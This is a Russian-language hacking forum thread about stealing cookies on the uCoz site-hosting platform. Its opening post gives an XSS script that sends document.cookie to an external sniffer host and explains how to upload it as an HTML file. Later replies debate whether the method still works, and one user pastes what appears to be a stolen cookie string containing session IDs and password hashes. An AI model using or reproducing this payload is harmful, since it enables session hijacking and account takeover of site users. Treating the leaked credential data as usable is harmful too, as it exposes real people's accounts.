Всем привет! толькочто нашёл уязвимость в Ucoz, пишусь впервый раз))

Тырим куки в Ucoz

1) создаём фйлик html вписываем код который тырит куки

<script>img = new Image(); img.src = "http://sniffer.ru/images/1.gif?"+document.cookie;</script>

2) Загружаем наш html файлик через "Обзор"

Смотрим скрин (http://www.onlinedisk.ru/view/381778)

4) Должно получиться примерно так когда файлик загружен

Смотрим скрин (http://www.onlinedisk.ru/view/381779)

5) Смотрим логи на сниффере (у меня свой сниффер)

Смотрим скрин (http://www.onlinedisk.ru/view/381793)

Ну вот и всё...

На UcoZе куки Админов привязаны к IP.

Хотя может я ошибаюсь...

Хех где то похожее читал ток там через чат можно админку на укозе утащить..
а так в целом прикольно за мутил респект..

Хех где то похожее читал ток там через чат можно админку на укозе утащить..

не подскажешь где читал?)

Хех где то похожее читал ток там через чат можно админку на укозе утащить..
а так в целом прикольно за мутил респект..
если про бесцветный смайлик со скриптом то это не пашет уже :D

не новый способ.. подробнее кто хочет _http://hacker-pro.net/sniffer/ там и видео есть вроде

еще актуально?

еще актуально, но на некоторых сайтах запрещено добавлять html файлы..

Куки Админов привязаны к айпи. Хотя должно прокатить всеравно.

уже не катит этот вариант ....имхо

Я смог стырить, но как расшифровать и узнал логин?

itemMarking_forums_items=eJxNzssNAzEIBNCWzHfAW02OW 0O0vQfhOM7JmlwnwPOaxPN9T1ZXu-5KCEuzpAqMDPyQBFiI2AjN4EZPHKwLFRC6SYREeg5sB4cuzH4X cvRyXTT-Q_Y16X4QlN-W46D5WCj7d2Vy7coDuySFV-Xr-VwwFJc7jA,,; treemenu=none open; dle_user_id=142; dle_password=d8be0919a798095266621a780e173255; member_id=142; pass_hash=577868b50d1676e9cb3c191a1fe85f6b; PHPSESSID=8112a33d76ac231f8ca1e023a1084019; session_id=b4156144ec733882e1f16ac52eb8c285; forum_session_id=b4156144ec733882e1f16ac52eb8c285; modtids=,

Актуально ?